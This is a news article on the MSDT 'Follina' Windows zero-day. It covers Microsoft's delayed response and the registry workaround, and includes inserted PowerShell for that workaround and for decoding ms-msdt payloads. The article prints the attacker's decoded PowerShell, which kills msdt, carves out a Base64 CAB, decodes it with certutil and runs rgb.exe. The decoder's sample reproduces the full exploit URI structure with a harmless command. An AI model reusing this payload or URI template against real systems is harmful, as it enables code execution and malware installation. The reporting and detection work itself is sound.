The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

A critical code-execution zero-day affecting all supported versions of Windows has been under active exploitation for seven weeks, giving attackers a reliable means of installing malware without triggering Windows Defender and a roster of other endpoint protection products.

The Microsoft Support Diagnostic Tool (MSDT) vulnerability was reported to Microsoft on April 12 as a zero-day that was already being exploited in the wild. The Microsoft Security Response Center team didn't consider the reported behavior a security vulnerability because the diagnostic tool required a password before it would execute payloads, according to a response dated April 21.

Uh, nevermind

Microsoft reversed course on Monday and warned for the first time that the reported behavior constituted a critical vulnerability.

An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can install programs; view, change, or delete data; or create new accounts in the context of the user's rights.

At the time of this story's publication, Microsoft had yet to issue a patch. Instead, it was telling customers to disable the MSDT URL protocol:

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\ms-msdt filename"
  3. Execute the command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f"
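The same workaround as an added PowerShell example (this is not Microsoft's published guidance): it checks whether the ms-msdt handler is actually present, refuses to delete the key unless the backup succeeded, verifies the deletion, and keeps a restore path for when a patch ships. The backup location in $BackupFile is an assumption.

```powershell
#Requires -RunAsAdministrator
# Added example, not Microsoft's text: scripts the three workaround steps above
# with a pre-flight check, a backup that must succeed before anything is deleted,
# post-delete verification, and a restore path. $BackupFile is an assumed location.

$ProtocolKey = 'HKEY_CLASSES_ROOT\ms-msdt'
$BackupFile  = Join-Path $env:ProgramData 'ms-msdt-backup.reg'

function Test-MsdtProtocolHandler {
    # $true while the ms-msdt: URI scheme still has a registered handler.
    Test-Path -LiteralPath "Registry::$ProtocolKey"
}

function Disable-MsdtProtocolHandler {
    if (-not (Test-MsdtProtocolHandler)) {
        Write-Host "$ProtocolKey is already absent; nothing to do."
        return
    }
    # Export first; /y overwrites a stale backup file without prompting.
    & reg.exe export $ProtocolKey $BackupFile /y | Out-Null
    if ($LASTEXITCODE -ne 0 -or -not (Test-Path -LiteralPath $BackupFile)) {
        throw "Backup to $BackupFile failed; refusing to delete $ProtocolKey."
    }
    & reg.exe delete $ProtocolKey /f | Out-Null
    if (Test-MsdtProtocolHandler) {
        throw "$ProtocolKey is still present after the delete."
    }
    Write-Host "ms-msdt: handler removed; backup written to $BackupFile"
}

function Restore-MsdtProtocolHandler {
    # Re-register the handler from the backup once a fix makes that safe.
    if (-not (Test-Path -LiteralPath $BackupFile)) {
        throw "No backup found at $BackupFile."
    }
    & reg.exe import $BackupFile | Out-Null
    if ($LASTEXITCODE -ne 0 -or -not (Test-MsdtProtocolHandler)) {
        throw "Import of $BackupFile did not restore $ProtocolKey."
    }
}

Disable-MsdtProtocolHandler
```

Run it from an elevated PowerShell session; Test-MsdtProtocolHandler is also a quick way to confirm from a fleet-management tool that the workaround has actually been applied on a host, since a script that returns success without checking the key tells you nothing.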

A Word document uploaded to VirusTotal on Friday exploited the vulnerability, which until then was not publicly known and which Microsoft had dismissed.

The document uses Word's remote template feature to retrieve an HTML file from a remote web server, according to analysis by researcher Kevin Beaumont. That HTML file in turn uses the ms-msdt MSProtocol URI scheme to load and execute PowerShell commands.


That should not be possible.

It is possible.

The commands carried in the document, decoded from Base64, are:

  $cmd = "c:\windows\system32\cmd.exe";
  Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
  Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

Researcher John Hammond of Huntress broke the script down as follows:

  • Starts hidden windows to:
    • Kill msdt.exe if it is running
    • Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
      • Store this Base64 encoded CAB file as 1.t
      • Decode the Base64 encoded CAB file to be saved as 1.c
      • Expand the 1.c CAB file into the current directory, and finally:
      • Execute rgb.exe (presumably compressed inside the 1.c CAB file)
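The HTML stage described above, as an added PowerShell example that is not code from the article or from the researchers it cites: it pulls the ms-msdt: URI out of an HTML file and recovers the PowerShell it carries, which is the step that produces a decoded script like the one listed above. Two details are assumptions taken from the publicly analyzed sample rather than from this page: the URI sits in a double-quoted JavaScript string, and the command is a Base64 blob inside a "$(...)" subexpression that MSDT evaluates when it parses the IT_BrowseForFile parameter. The sample HTML is constructed, with a harmless command in place of the attacker's script.

```powershell
# Added example, not code from the article or the researchers it cites.
# Assumptions (from the public sample, not from this page): the ms-msdt: URI is
# in a double-quoted JS string, and its command is Base64 inside a "$(...)"
# subexpression that MSDT evaluates while parsing the IT_BrowseForFile parameter.

function Get-MsdtUriPayload {
    param([Parameter(Mandatory)][string]$Html)

    # 1. Pull the URI out of the JS string; "\\." keeps escaped quotes such as \" inside it.
    $uriMatch = [regex]::Match($Html, 'ms-msdt:(?:\\.|[^"\\])*')
    if (-not $uriMatch.Success) { return $null }
    $uri = $uriMatch.Value

    # 2. A "$(" subexpression in a URI parameter is the injection primitive itself,
    #    so it is worth flagging even when the encoded payload is something new.
    $hasSubexpression = $uri -match '\$\('

    # 3. Decode every Base64 run long enough to be a command rather than a token.
    $decoded = foreach ($m in [regex]::Matches($uri, '[A-Za-z0-9+/]{32,}={0,2}')) {
        try {
            [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($m.Value))
        } catch { }   # a long run that is not valid Base64; skip it
    }

    [pscustomobject]@{
        Uri            = $uri
        Subexpression  = $hasSubexpression
        DecodedCommand = ($decoded -join "`n")
        Suspicious     = $hasSubexpression -or ($uri -match 'Invoke-Expression|\bIEX\b')
    }
}

# Constructed sample: the shape of the HTML stage with a harmless command in
# place of the attacker's script, so the decoder can be exercised offline.
$benignCommand = "Write-Output 'decoded by MSDT'"
$b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($benignCommand))
$SampleHtml = @"
<html><body><script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h`$(Invoke-Expression([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('$b64'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script></body></html>
"@

Get-MsdtUriPayload -Html $SampleHtml | Format-List
```

Point Get-MsdtUriPayload at the HTML a suspect document's remote template fetches (or at a proxy capture of it) and read DecodedCommand; for triage, the Subexpression flag matters more than the decoded text, because the "$(" in an MSDT parameter is what turns a diagnostics launch into code execution regardless of what the Base64 contains.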

An academic paper published in August 2020 had already shown how MSDT could be abused as a code execution tool. It is possible that Microsoft's security team failed to grasp the potential for this behavior to be exploited.

No, Protected View won’t save you

Normally, Word is set up to load content downloaded from the Internet in what is known as Protected View, a mode that blocks macros and other potentially harmful functions. If the document is converted to Rich Text Format, however, the exploit runs without the document even being opened, let alone being opened in Protected View.

Huntress researchers wrote that the Preview Pane in Windows Explorer is enough to trigger the exploit.

Researchers discovered a Word file that exploits the same zero-day as the document uploaded to VirusTotal on Friday.

Organizations that use Microsoft Office should investigate how the vulnerability affects their networks. Disabling the ms-msdt URL protocol is unlikely to cause major disruptions in the short run. Until Microsoft releases more details and guidance, Office users should turn the protocol off and give any documents downloaded over the Internet additional scrutiny.